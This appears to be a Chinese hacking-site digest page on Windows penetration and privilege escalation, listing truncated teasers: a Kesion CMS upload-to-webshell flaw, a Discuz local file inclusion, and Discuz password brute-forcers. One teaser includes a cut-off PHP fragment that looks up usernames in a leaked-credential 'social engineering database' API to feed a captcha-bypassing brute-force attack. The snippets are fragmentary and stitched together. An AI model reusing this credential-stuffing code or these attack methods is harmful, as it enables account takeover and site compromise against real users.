win渗透与提权汇总

旁站路径问题:

1、读网站配置。

Asp探针-超详细显示客户端系统信息

Asp超详细显示客户端系统信息,asp获取Ip,asp获取浏览器类型,asp获取操作系统类型,asp获取来路页面,asp获取真实IP,asp获取代理IP。

突破Google被屏蔽方法

根据Google透明度报告显示,从上周(5月27日)开始,Google的部分服务开始被屏蔽,其中最主要的是HTTPS搜索服务和Googl

科讯KESION CMS最新版任意文件上传WEBSHELL

会员上传文件漏洞,可以上传任意后缀

昨日IOS更新,苹果 修复了22个Safari漏洞

写在前面:

走近世界上第一个地下黑市搜索引擎

我们经常谈论地下论坛、非法网站或黑市,但是,正如他们的本质是属“地下”的,即运行在“洋葱网络(Onion network)”下的

你早已被窃听:小心身边不起眼的东西

据可靠FB线人透露:

Discuz爆破无视验证码 牛逼到能调用社工库爆破!

<?php
class fuckdz{
 
 
    public function sgk($user){
        $a=file_get_contents("http://www.soyun.org/cha_api.php?so=$user&auto=");
        $a=iconv("UTF-8", "GB2312//IGNORE", $a);
        preg_match_all("/7%\">(.*)

Discuz UC_Server 本地文件包含漏洞

看到有位朋友提交到了乌云,那我就把这个包含放出来吧。

http://www.wooyun.org/bugs/wooyun-2014-062388

##

Discuz批量用户密码暴力破解器

1.支持discuz X1/1.5/2/2.5/3/3.1 等版本。

2.程序会自动判断编码。

3.有验证码的爆破不了。